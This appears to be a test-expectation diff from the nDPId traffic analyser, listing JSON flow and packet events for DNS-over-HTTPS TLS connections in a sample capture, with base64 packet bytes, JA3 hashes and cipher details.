+00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946739349012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739349012,"pkt":"ZmZmZmZmRERERERECABFAAuAVvpAADYGOMgtmbtgCgAAAQG7lIKfbuPaCXxTn1AQAIO1KAAAFgMDAHoCAAB2AwPVEzRRR6mT0E92uybAnGbGZWeWVD\/m1\/eNOhfsedWm3iCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/hMBAAAuADMAJAAdACAZ+iIImd19O1rP7adwYQe9xC\/+1jN6jL9eBLofHG6SbQArAAIDBBQDAwABARcDAwtedm5F60tr1KSpSWgXMdmmX3Ys4sUEWudZbc\/GVmqkUsaepFDQQ8mcPIjegsJEHlTqywqGyBqt0c8EFI9PK3y9wMc\/+3ozr1s1L0Jd42MTaMhOndcbb8aYEnSYi\/zIVpLn6qdOkfyxUEfDDwQC7tdpz8rWkLOD8s1Gc\/+GapP01LuZUSoxJKMEPFivq1rS7ax5uSaTQJul+x0Q1A7WKBQI96lxNlKhu8S\/F6aiQdLb9bng9LygmgdlJ0IMNTAzSle754kwT44x6hxHdY+dgL3FfpB162mfDfNtflZ3mHhPTnkpYtlwwqsdseLzRBUZP3Q4Ja18aDfnLKv6lwZqUkYqVbKbxYZxo1iV+7HgYRo00AC9h97+\/fjdDvQp1\/ZlgGZVor6fI\/2UbNyKd+CKXq\/WxiWd3cfOC5mfsohQgZfh0mCkf9dr3uz3ujKCV4y2skvjk\/nvMYWaCk8YYJ09fpkBhHkvDLX34BQkxdq8SFFlf9KC0xLeicU3h\/prF3BxKbFcEuJVsTQ1IwCvvKPttu9bXK5Pot+r5ctGacxaL2PbnIguGLNO3oXuqP1Q9c+9bIOgs3SrVqvTzY6u7z71LwLT4lIRUT1tdFuzNBsI3uP36b\/9IAg3kdqQ6B86AhSq6s9YI9cVyIl6Ij\/v4hTBVX3z6+HeVN1ZOCnsTQ5pzdsr1wh7Urw2Dq8ujiDkOD+Fou6dMOYoID0SKEwKKw1eszHLhxLaCFy\/r3d7Go4MVMtt3WT79fbDbeLxIVt3hgCghutkKtcuHd5chD4oLWELh6tM9hPl+4nCK4m\/+O5cbKg6OL6jCTY\/gO0DykmoFGAjlffWT5qFPKGIHd1y6jfLFBTeg895J4XJsRYeS8WWpPvi7T\/OrrEOEoSups8MYg4y47m6jBSiviaU3Egrqb9OmbARusmAkBOc+b7sPEV3vJ7rmbEmSmp9es6Ma1hTLKZ1zLv5y87EpErdv2GmabDERgys3rQli1zICByjjT3wKTtOmnCFVus\/kEZ20ZKIT3R1SBoRFrSMK3NkxEq+liNvGGcf+EHNQ14qDPBLs0m+Amz59cCkIeFxK62ZDg\/D8+8JoEQZlyE9AWaFti+8vDVxBObTHdc9i3Kw7ewteJw63QBC9EWl8n8clagy9wb+UFjl1FNsicAfIiO1Xs\/Zye+Z2EVvEt6aOGsYYXUIiuSHHHy+OTANd5q6FtSmxH5d29V\/RRYtUF+RFNqvu7jCJbpfY4CMi\/uFQpCXgIsM\/FuZw9ietB43gXYBJPigmUjQOJrnl2aOEVZN25twSZkyFkDyfGhTbcdXECqNFF8TnC98sE4z4cSyaAj5eIgD8KWiILJX2yoi+dB+VLGxM9ljCfyywhEqQD9FxwMPenX20RdEq43Qg2oM44SbTOcaPyRK5R1+UoArEareBxTtwbIj1\/gYPRWTkZ8pK7ELTpeDzq5dz0ptJVwSUIH0JdKkVE3RFHc7LCdWysSVUeFYgHXl28Deq1y2qizxSTQTQGj788zPkj9nRqwsew3ffxErP0pR2erOmxzmRPzUcbJ79H2yupuK1CFndSabVcPzkp0n+2KlKx3Rn8tyf\/hn5qm64LAaVaGFpUoNBQQlUEAUYg9kdMVxRV9nD92+mrKa+2JReRncweAA5LhgzrfrEPwyc1B\/FBpBxwIyV7Xy5RQehy\/n+t2tqgDOZsROSPZV\/c502uShsqQ80dFUM5RKxh0mzHQFM0OK4kAUJhq4wyFBHR892ibgw3EufqDFUX7y2fDW3v9sHJ0PjEBQf0Z+LPQlMJXmUS7wgfHtNIgpjboq9\/XXfFayEzII5Ncg7bWrTiyo4JZFWiVHcfds+TlAJ90V8nR81jNjJjiPpWGiw\/wBoLReBkDgcemdC73ykLweu4Hz14TsLOSuTZsu5EZr2HV10q+61hH6ogeRQcst3XaFzwE6kceLYfEcwH6tnp0hMB9x62cNInT6JQ8Ps6Dsa1MRUtnCTsYL1E0KIBY7R9nY7dSZJpv6\/qCWpPnVEfxATo177u2nsXiV3PW6LNV3vcyinTzbbKWNsqHSX\/Rxrwf+OdHXgpeBX43CwbB+Rl\/n0BchEVnzKV702Gf9HUv7cdBb0q\/i8hYFIFBzZttYWXxvMMCuX5vFFfZ+rdfdvsqESgmVU60GNMEWlpOcj4wiK5O4Sufp7t63lXuXFEGAyK\/zCX6bTsoTK5InJmYeoxH7z6vro\/3e6Rs6NXLtea8yb94qYkPEVBEqGEipZDsyb\/R\/lWwE43D7Aub6g9hkVbl53hLJGZnLMYjNGkky7jnCfZMKDiaQ3bMKv84lVUSDkp3sK9qeuBF1mmZVLhv9HAxir3SYBNQzWsBGcCUpO9xkV8FP0kj\/iTW\/FfLKk\/DKd+BUjaxMV2uhSSQCmVokip5q8tl9J4DEAniFz7fyP2MXZu9ul4s+9NyHUnr96E7oyJz9targa6lIbTNrabDpef+RQ95Jg3dEACMFcNChtfiB\/b3jxW+VTLzdeEUKMhmN9RiB66l3ilE2UeLuKgX3mDdaXzGma9QHxu929MG9uV3gmQHGDy5TCH2vSSxC6z2\/OmzDacBVelfY5Epw7lZBVVGZZnkHXtDZ9aRkPwQ5ycPlis7xyXgrmjnzVXCU2sPi4g8aIZETiD58CL1o5eQFVuuBNN+YXqwNw72pWFPr7n1hEhwv6Vw12CTiC6plOVTlmWo7Hq2\/pHWhiu+RR5lh+vtYdVwTRC30+fnyRct1ka9vbNMqvCrrwxYa5D5R79sdMZcHtogzlIhlvBA\/hEtCrwDCOTsOVV\/YHdG3yKWN4O6RFwnZZifYo9t6777XaaqBBnRbmAIh24x\/s0cQdV+c5CkmqhwnyVXuFfH9t0XQ1553XL2pziV2ZWgjNschuXZ58zhktYtAMF0VjgYyEW7jDxhCpc\/J+cRaztT52A0ytvkRgmQaVyJn+aLdW9sCq3AlQ8gfIfMUsOa4qrrfYi\/W6wC7p\/JpUVApLzH2mKuhH3cCajbIykaOD4hdj7uAYv5ROV\/V+1+PXMG5ia\/9hbHOgDJFO9d9IqY7KSn3C+1mBqumfNrcdhFQFiTH43iJKL7gLi6km2zN5cYKZjrmjbjv3JkWSUwYRpPDfBjgX5JiTKnp6do79w4bx6CpetzdKmLMsuX1smdlFu3kujpvbqv6a1KH6F4pTm1MQ5RJmmfgdquxg6OsIIvP\/kEDn+LVg8ZMm87yYyquFkOWwe1Uj\/Vi3kL4fPIR5niD5XVoEWohLwDdVCqKts+2P1GYyEHqQAMrqWmQegZl\/LhTQw4INPlPDFEm0yb+KBOh00ktbHzCM3CFPGnzYO3alldd67nq954eKLkUOGB9MeSY7cUwdbulO4dr11zq3CmOecqOMxOt2f\/VIopIebzlUenef+vRdxbO4ewVSqUhsy+yoPWXBOpZPgLhhY3LxBP7ooDeCCIO0lcZB\/CBSyUEgiFK4lZ3kAGz8uFt3A\/vRHHEykEvXspKCwmakvQLGtne7shF+m0j\/3K2vxEjTMcnD1pU47tDCPXW32n5d+GKj1kQXvMBCTdCNuO1i0NSTDkuKc7j5+f6O6RyusC0fFzTP7MVdbXFBb1omPMQEuUSj0+hj0rK73sjeV5xq8OVFpFoURjJ2NwQsCAu\/jAm112150nTKknyPg+N6HqbvoOC0Wpkh7IwnBnV+fSTZjZ4AEkEeoKm"} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946739349015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739349015,"pkt":"ZmZmZmZmRERERERECABFAAC4VvxAADYGQ44tmbtgCgAAAQG7lIKfbu8yCXxTn1AYAIOAngAAUbudk7Sx467B78RwxwixN7WbszxDSJth5tiFKuiBrGoB9KFJtYBVt1C9rFJk5PyiCKlQsUVoHGHAH28fXEOq226wLx4N\/Z5eAHXlqMB6V1mSenxLPr5ItjgHCvxui0hIr8CHs4BD\/dcyFi\/lJAfYyCLIMg195o3ptTftZf8UL\/yW+5j1eIJyx2wYxG1Bmojg"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739354159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739354159,"pkt":"REREREREZmZmZmZmCABFAAFFsX5AAL0GP4sKAAABuetRAa5gAbtwXMMeYngARlAYAfbM4AAAFgMBARgBAAEUAwPEqi+8SizamcFZuiOMoqnZy7ZEtN03UH+nij+VYBL3GiAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIAlFpvTRrkboC35Gi6Kti1ZQzFT3L63Tg7Ad2VS1Z0Nh"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739354179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739354179,"pkt":"ZmZmZmZmRERERERECABFAAxSLpJAADQGQGu561EBCgAAAQG7rmBieABGcFzEO1AYA+rX7QAAFgMDAHoCAAB2AwNebHWZixx0UeVpRBPFfxfOwpvxbfyV+ENeQi\/Un6YmQyAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3BMCAAAuACsAAgMEADMAJAAdACB1L93FSUikFZRCKYl+OoNXGHhZBDYuCiNIjz\/6VCChXhQDAwABARcDAwAgdZlJOwY6+pChCwvT27tLGZnet+yerzqND\/r13r3OLdQXAwMKE5aV9MRHEDXFawxN2Z6ZXTlxr30g5cib8A44fkQ64oQQPk\/j2rM6co+1b6nblkLeVstFbtdteXwKa840eY9TBhZcpregM8Gpq1oOWaP3aNoy3x0m7PtgdMXWTRJ7rBzMj95YpQgnRNENvlH3xRXTNJuz0OfawrfLZMK40dTY8qdEtSvVWaOv58OBFTZzds8x7Jv0lUMqTicPkVrWkLGPasMnh+a2IVbs4dzr6AhsFrB+RZ1Cwi3B7S6zzr3HKx3FQGuVtHh19izb6w3PsdZ173iclTsS5Bteswb+0EdgltfMU7tCCWlZhlMw5cbiqzX6GLMdzRL4kMNW6gZ94dTc92SBIwy+nEoGbWZhqTeDuHiAUARf+gliy5YoFjW\/PRAypf5PMRtEZClIDkjH3prUoCFGtLR5uf4Ro0aKo3ih\/KCyAGbVEIvG4bDrcfRxO0cIiVz1g0D8AUPbTDsJO+EPspEYZgIriHIBYFx\/k\/flIHH3EjcpqIe+X8XzMf\/XqWL46qAhN1cBUZXyVc3ZIhpeJ7ZcaAbPdH2pnTMTM+2Go4igirnaKWq3AflEDkSSdueX+UQOyAZUkd6Z\/x1Mwq9Tb7hXL6vtOYcRcpywMzYkakngWETbQss0CojZbN6WAPS\/E+Yya6CgGI5Mt3dulPgu8jNdumumeB1P2glp9qwQHuvHZ1QS+cPtS5x1raYCp7T5sLegZ7EBanNjOEnVAU4IhPuW0ciFUM9Mj\/BzgDWE\/hUdNhPhhQjiaUBq7VyAXKWvyO4Dx2Fel0gu0u32uA\/SHIYv4dBAj17ghhBMv+sGNC8NMtNWhv9aqIp0FgaNgTJ0u6ZahzAQoaba8gKEvhS9MXrxWiCXAHjt1VsuslTiTWmDXRn19O8C7v9DYdY\/x+ZHYaRltrJ+iDZDtT011nG9MjUMy2gT88psevKL0b5pLEr8mJZKye0N3pZbPCi7mofLMsInUgCJYAIJe6z94EV17S9g5MdytiaRjgrDRHDrubquER\/+3IoTeZlSES8Dx7zlXZ1xB0O+hR5nXJGyIskMCiVwzAersZ9n8hiUAXpNADMi79ZOaHWxepo2ogdjtLk6L5RJOzsW\/4O9s\/bE+P+1smYJ8Xz\/vrKCk0smpZMpgO1UV8s8gCIdy3Fy602DcQY72cCEk\/bea7v72CbMggpz6myeQuHNx9T5ZrAHxOyDqp4pkMAhTfD0dC3xg5zkOkSQr5pJx6ievuDl8+wenRgTssVF8J1H1XRwU56YwKhMsgqTn8eD+cywTh5zCo9dNvl9ZfHWmV3Mdg4aJz1dYzmdkUhSu46Md5G4HmOnLwI\/XQbyhHcZ2WUU9mvD9BvjP9kn2RjUXcRT+d\/cwjt2Esxb2ENHpq2bs5raN\/CIbWH\/kUQRUUCpYL9CdmiBZpRtJPrOXy6iWAKofUme88d2tr7pTpEzcTLRU5BoYhPgOVQbcXw1q3yaTUVQB4Wvp1Zu7ruywhz7ujDaUupe4ypGeBHoMNq\/GonbnedBdKUd5q1Hau\/cYgTRejjU\/rutBsmd1TsWFTtw4Narsizl07q94yxV1+nrTG1gDq+RefJI3JM3SA8ccXZmrC6\/9FsgFjt+2cDWt4JB10cFksHu2\/ml\/dASyc2jx2disClcngjvd0YpBOF1xYxILWWqUHc2SCZLZ2Aroa1pMW21jKFGB4Ar1xpSSuVVcPsSSozoKj4\/j0FvDgtwJoY1rK5ezs7yUOh0iG7\/TmlCa9VwcqKlbka3ucK+EV23eB8BAhdfkU1ZRvrzop+h56cTHnAqdzA+huEFkYic20FxEaceaf8SUoyM1\/uxur0377YEwqxCUCLmkpdjf2hKaG2o6w6dX9vCExiNhM2Jlol1IlMb4fWmsojPIiIMoMr4vCBzw+JJJUMfUwOy6sleF+nP5muuQ5rVTMwbb+OCuGE2jDpUYai822DbFN3NNQkq3i2+StVf9WCISeMMwfPk+unXE38SgIx+97\/gooknQY70IX3TsgQKFcc1SEcM6rgwk5pR4rwHfer1xQNsM1RKZGf8xeZa+ag2yg\/IxDT4LymayHchHxdaigJz4AcxjPrNuXaoi2s3E1xPh2H1clb\/ZJJwrzY7BZjc1TQovWjOw6wm8GHMHRYPWaLpFhaLJX6iixp0BBfYBFzNmIvcsaGPhpGQIWG8LNHl1vR+XYpcJzMWemerQw5\/TiIwzhe4xLQ3Ee69tOX2fKhT1GAVUyB0oeuLgjlb0FpWzQ\/lyORIy\/GJNnRuRgdZy8RNv03eZWNeLTHNU8amNvoSqoCJx28QcG4ZFWjkiBlGlisQg9MS7LfxB5YDcM35ukvbr57gX64nw00G3GJe5JnYnqeIHNIuWQI7nvVvBHP3PfWTKRa21nyK90D70j+bxIjA68ylRrcDSlrq9zK60l62NWR551fMFXxuoHTFc7qQ+K4J0ESDuqw7x47BFgsRGeVuVNYexUC0TU1lBMwcu9BGg+0G0+duPvOP3aW+jzZAhqEMopcx946w0BTw\/+bJ5qiZX+nSvNF+IzKPfnXq7G+okmmjpg\/ianwcwtjvgrAC4pnZGY+m\/27CyJiTEi9fYvN2T1KGpFt19LfH\/UKHKmZdKRHhHpgpAUwyz0ixR7JCGsZBCNp7SmZtoObLBfKyYFLS1OdeJn33VC7QU5ZIB0TIGMOnasD1IIceFavDDD1uWjFat9U8TSvdQkrVOP0H+iiog+bscrfkzNeLsrOj5JaS96ZDARUESAXVBQE+wq3Z0J6WrNdNJCanh0R13lIIfbBO3tp1JQaYJcU43NTOBatEStIgR6pggN4HF+DO2dNPqB6DJlllwkNWiMSwaSg\/Qokswn+fLJvn7pPXb8ILKczNLht2jz9aEp0+I8QfJ9sljCRmG\/qdZknc3MVkUZCxQWgeYvnw16OCgKVrO7aXg97ZXgFQywgIz4XcG4cQlmlUgZ5vBckLpEq1wb47O2DC7oYeIkB7WvMn7pIP5qKMmIewtCOip18QV5mNZQ7kfdTHrJyhNEAXbfaMkBbJyAVJGCBIYwvhIF13Izb7B6Cmnolxq1r5eurWQOB44xUuJop6m5Nm5hxmATag\/xOQnBP8r2vNMxUihmUT8anHH3UfjXAY915xtFCA13IdATjUK5r\/nOjWuYELtJmgRJ2oeyJFl+xU3enOifKqvSW9w3npBMuO6+ND+s2KXgdXZpDonBBs70SsK8NzgIT\/8A0se3txfhbwpY2EseDOLiVbMtTN8WhjrhnZpDEjzwdCV8jV8ki7+xTW6Ae32nBN9uRAZ20gpXPNrrgk+1oPaXal74NAuojgux90nmy7fGQvJ\/CCkJUFP2+xt7moAmNV6Bvh9GIV51tdhbag9+AtGmBI8WUGXz9QPwduT4nOO+Ia6cTJuP1+CL3tb+p6ijB1Jg583CQ8vtkm3Pw8NXcvYMcBOIpsKkRrBsD67+irg6nQFwMDARkSIsFlIX96rBVOSHF8j3nD4OzTmAKQfrZ20qhfNZw8PH0q41dWeUeDXwstCBpDPbSnxrC2ED\/1S7AKbK3628b0BuTXrCb9vI9IIN\/fjnNzXGCyCTfNGyQC7Z2s3ZZgGilAyQTgWS6IBv0X\/cXimIPEtNGeEgUfHp2ZiHChqtgUwdJbYZhYRpk9Vh4PP\/G\/geKDMJuF9LkfMNZa2A5\/kJwnnbAN+9JGdzxyQUZGqq8DCQqxQ4uAbnIJmcLNJBx9PHCzhhj8vk0E7hUaqEkvClX1iiIhNhFlmQ9FsqBvx5KYUvaVI86YI314BKZUdBn0Gn9Psqh3g3PCqYbuhSA+KXAHAB6ifkPpQbZxhpKA+yQN\/aKxaWBvyR8fvBcDAwBFUlHyM0i8aQGJ+PRPScWQmM6JruXTVxzLP2v5t10WMRjAfhtdK+kbZwmOwuBqS0fXovjROfDM5rGu95fh\/DYXUBWZSAER"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946739354182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739354182,"pkt":"REREREREZmZmZmZmCABFAAB4sYBAAL0GQFYKAAABuetRAa5gAbtwXMQ7YngMcFAYAfXMEwAAFAMDAAEBFwMDAEWXq32pwHEzhcGDp\/NKLjvxgMAkksKxKcFIOFCDodEb90S6h8Gu0G\/BLuFfZ5sttQB7HESBT0tBjYEfHL61VthvR6QOjls="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739374011,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739374011,"pkt":"REREREREZmZmZmZmCABFAAFF9DpAAH4GIdcKAAABdMqwGqhiAbtWR3H7NJTy0VAYAfbm2AAAFgMBARgBAAEUAwO\/FCTCx\/QYlyW+S6EGE0TFYQ1H3k3FO+5pvJMM4NWMBSCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKpgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmxpYnJlZG5zLmdyAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIOxloY7MOWvSgZ3hQaojp9inJ84Sw+igf7hW9Y3pU+ch"} 